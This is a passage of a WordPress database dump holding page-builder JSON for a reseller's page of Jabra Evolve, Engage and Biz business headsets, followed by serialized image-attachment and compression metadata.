id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e503076\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3896bef\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/JabraEvolve65t_ProductImage.png\",\"id\":2852}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"716ef9e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"e8ecb8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9de26d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve_80.png\",\"id\":2853}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2ea5436\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"242de0e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Jabra Evolve 80<\\/h3><p>Engineered for concentration, Evolve 80 is a corded premium headset for professionals who need to avoid disruptive noise. Superior Active and Passive Noise Cancellation provide crystal-clear calls. All-day comfort, an integrated busylight, and certified for Skype for Business, Cisco, and more.<\\/p><p><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f4bed1d\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"07d43f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c84f84f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Jabra Evolve 75e<\\/h3><p>Engineered for professional sound in comfortable, wireless earbuds, Evolve 75e is for those who need Skype for Business and Active Noise Cancellation \\u2013 but in an around-the-neck design. A host of professional features found in the Jabra Evolve Series, combined with up to 14 hours of battery for calls and music.<\\/p><p><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de05f85\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"814dc95\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Jabra_Evolve75e.png\",\"id\":2854}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e653f8\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ab57536\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c93a2ba\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/954a74d741e4aeb8f7a9bd04d9dd2b0643c89424_00_Evolve_75.png\",\"id\":2855}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"8392c16\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d1ec16d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 class=\\\"ng-binding ng-scope\\\">Jabra Evolve 75<\\/h3><p class=\\\"ng-binding ng-scope\\\">Engineered for concentration in the office, Evolve 75 is a wireless premium headset for professionals who want to avoid disruptive noise \\u2013 and need mobility around the workspace. Move up to 100ft\\/30m away from your connected device, all-day comfort, an integrated busylight, and certified for Skype for Business, Cisco, and more.<\\/p><p><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e4c0a5c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"0d8290d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"97dea23\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Jabra Evolve 65 Stereo \\/ Mono<\\/h3><p>Engineered to multi-task, Evolve 65 is a wireless headset ideal for professionals who move around the office, but need to avoid interruptions. Connects to two Bluetooth products, includes an integrated busylight, and is certified for Skype for Business, Cisco, and more.<\\/p><p><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f0731e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9efebba\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve_65.png\",\"id\":2856}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"815f5e9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"5a46717\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"fb7bf8c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/752b1c6ecb4d653451bc19b4b566a870ae6bd94f_00_Evolve_40.png\",\"id\":2857}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"910e26f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"5e871e6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Jabra Evolve 40 Stereo \\/ Mono<\\/h3><p>Engineered to boost productivity, Evolve 40 is a corded headset for professionals who take calls at the desk and need to avoid interruptions. Connects using USB or jack, includes an integrated busylight, and is certified for Skype for Business, Cisco, and more.<\\/p><p><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"facd86c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"44d8d74\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7ce9531\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Jabra Evolve 30 Stereo \\/ Mono<\\/h3><p>Engineered for flexible connectivity, Evolve 30 is a corded headset for professionals who want simple and fast Plug and Play connection to USB or jack. Features a control unit for easy call management, and is certified for Skype for Business, Cisco, and more. Comes with leather-feel ear cushions and on-the-ear design for all-day use.<\\/p><p><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8213047\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"17446c1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve_30_.png\",\"id\":2858}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9153a12\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"c643e7a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"81e8a0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve_20.png\",\"id\":2859}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"af9877f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e3a1d98\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Jabra Evolve 20 Stereo \\/ Mono<\\/h3><p>Engineered for easy call management, Evolve 20 is an entry-level corded headset for professionals who need great sound for calls and music. A control unit lets you make, take and mute calls, and simple connection makes it easy to get started with your PC. Comes with foam ear cushions and on-the-ear design for all-day use.<\\/p><p><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"801e577\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"9929e95\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ff8dfcd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Jabra Evolve 20 SE<\\/h3><p>Engineered for easy call management, Evolve 20 is an entry-level corded headset for professionals who need great sound for calls and music. A control unit lets you make, take and mute calls, and simple connection makes it easy to get started with your PC. Comes with foam ear cushions and on-the-ear design for all-day use.<\\/p><p><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5f15601\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"caaab5a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve_20_SE_Mono.png\",\"id\":2867},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5a94b95\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ca1cdef\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f301c92\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Engage_50_3.png\",\"id\":2870},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3dd0dc5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"33c6633\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>Jabra Engage 50<\\/h4><p>Is your contact center moving, or considering moving, to softphones? Are you investing in contact center platform \\u2013 whether on-premise or cloud-based? The Jabra Engage 50 is the ideal digital headset to power your customer satisfaction.<\\/p><p>The Jabra Engage 50 features a powerful processing chip in the earcup that delivers advanced functionality including call analytic data.<\\/p><p>[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"48b3240\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"89270cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fd3b8a7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Jabra Biz Wired Series<\\/h2><h3>The Jabra Biz has an extremely lightweight and unobtrusive design.<\\/h3>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d449904\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"656485e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"fbc0249\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Jabra Biz 2400 II<\\/h3><p>A wired professional headset that delivers outstanding sound on both ends of the call. 40% lighter than competing headsets, with super-soft leatherette headband and ear cushions. Built to last with a reinforced cord and unbreakable boom arm.<\\/p><p>[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9369d27\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"859dfc9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Biz_2400_II.png\",\"id\":2873},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0dd5280\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"66a6f72\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"998a810\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/jabra_biz_2400_ii_mono_3-in-1.jpg\",\"id\":2875},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"e37a9d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f989140\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Jabra BIZ 2400 II Mono 3-in-1<\\/h3><p>A wired professional headset that delivers outstanding sound on both ends of the call. 40% lighter than competing headsets, with super-soft leatherette headband and ear cushions. Built to last with a reinforced cord and unbreakable boom arm.<\\/p><p>[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"38cc4d8\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"a2798fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"cb65d6a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Jabra Biz 2400 II DUO<\\/h3><p>A wired professional headset that delivers outstanding sound on both ends of the call. 40% lighter than competing headsets, with super-soft leatherette headband and ear cushions. Built to last with a reinforced cord and unbreakable boom arm.<\\/p><p>[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f72a8b3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"405c4cf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Biz_2400_II.png\",\"id\":2873},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7f07070\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7909a7f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5bb3037\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"349a8fd\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/85RJqPjfjng\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"a7a7db0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"a1a4e97\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1a4c36b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6a83600\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"6a528d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"838e970\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Jabra_Biz2300.png\",\"id\":2874},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0869d9c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"bec7706\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Jabra Biz 2300<\\/h3><p>Built to survive in a high-performing contact centre, meaning fewer headset replacements and less downtime for you and your team and lower total cost of ownership.<\\/p><p>[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8f9ee62\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"27b34fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4b9598c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>JABRA BIZ 2300 QD<\\/h3><p>Jabra Biz\\u2122 2300 QD Mono is a mono headset with QD (Quick Disconnect) plug that provides instant connectivity to a wide range of desk phone systems.<\\/p><p>[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"35b2553\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"68a9c4e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Jabra_Biz_2300_QD.png\",\"id\":2876},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"175e85c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"519e230\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9d7292d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Jabra_Biz_2300_QD_Duo.png\",\"id\":2877},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"9e4889b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b26b188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 class=\\\"solution-group-card__product-name ng-binding\\\">JABRA BIZ 2300 QD DUO<\\/h3><p>Jabra Biz\\u2122 2300 QD Duo is a duo headset with QD (Quick Disconnect) plug that provides instant connectivity to a wide range of desk phone systems.<\\/p><p>[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ec1e2e4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"7187165\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"8d1d85b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Jabra Biz 1500<\\/h3><p>The Jabra BIZ 1500 is an entry level, low cost professional corded headset built for cost conscious contact centers. With noise cancellation technology, background noise is reduced providing a more professional customer experience on every call.<\\/p><p>[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b92f5f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ac21aeb\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Jabra_Biz_1500_DUO_QD-1.png\",\"id\":2880},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e34ebbb\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"48b05fc\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d347cd2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Jabra_Biz_1500_DUO_USB.png\",\"id\":2878},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"73b78bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9a82801\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Jabra Biz 1500 DUO USB<\\/h3><p>Cost Efficient Professional Corded Headset for Softphone.A duo headset that provides USB connectivity to laptops for softphone use. Comes with a control unit for easy control of volume and mute when on a call.<\\/p><p>[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(5113,2873,'_wp_attached_file','2019/02/Biz_2400_II.png'),(5114,2873,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1354;s:6:\"height\";i:1354;s:4:\"file\";s:23:\"2019/02/Biz_2400_II.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"Biz_2400_II-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"Biz_2400_II-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"Biz_2400_II-768x768.png\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"Biz_2400_II-1024x1024.png\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:23:\"Biz_2400_II-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:23:\"Biz_2400_II-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:23:\"Biz_2400_II-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:21:\"Biz_2400_II-20x20.png\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5115,2873,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:0.09032842672749542833887659298852668143808841705322265625;s:5:\"bytes\";i:632;s:11:\"size_before\";i:699669;s:10:\"size_after\";i:699037;s:4:\"time\";d:1.1999999999999999555910790149937383830547332763671875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.2400000000000002131628207280300557613372802734375;s:5:\"bytes\";i:632;s:11:\"size_before\";i:12051;s:10:\"size_after\";i:11419;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:35929;s:10:\"size_after\";i:35929;s:4:\"time\";d:0.11000000000000000055511151231257827021181583404541015625;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:180364;s:10:\"size_after\";i:180364;s:4:\"time\";d:0.2200000000000000011102230246251565404236316680908203125;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:299104;s:10:\"size_after\";i:299104;s:4:\"time\";d:0.4899999999999999911182158029987476766109466552734375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:22468;s:10:\"size_after\";i:22468;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:56209;s:10:\"size_after\";i:56209;s:4:\"time\";d:0.11000000000000000055511151231257827021181583404541015625;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:93544;s:10:\"size_after\";i:93544;s:4:\"time\";d:0.190000000000000002220446049250313080847263336181640625;}}}'),(5116,2874,'_wp_attached_file','2019/02/Jabra_Biz2300.png'),(5117,2874,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1400;s:6:\"height\";i:1400;s:4:\"file\";s:25:\"2019/02/Jabra_Biz2300.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Jabra_Biz2300-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Jabra_Biz2300-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"Jabra_Biz2300-768x768.png\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"Jabra_Biz2300-1024x1024.png\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:25:\"Jabra_Biz2300-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:25:\"Jabra_Biz2300-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:25:\"Jabra_Biz2300-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:23:\"Jabra_Biz2300-20x20.png\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5118,2874,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:12.726908720550571985086207860149443149566650390625;s:5:\"bytes\";i:94719;s:11:\"size_before\";i:744242;s:10:\"size_after\";i:649523;s:4:\"time\";d:1.520000000000000017763568394002504646778106689453125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.449999999999999289457264239899814128875732421875;s:5:\"bytes\";i:2182;s:11:\"size_before\";i:11827;s:10:\"size_after\";i:9645;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.14999999999999857891452847979962825775146484375;s:5:\"bytes\";i:5853;s:11:\"size_before\";i:36247;s:10:\"size_after\";i:30394;s:4:\"time\";d:0.13000000000000000444089209850062616169452667236328125;}s:12:\"medium_large\";O:8:\"std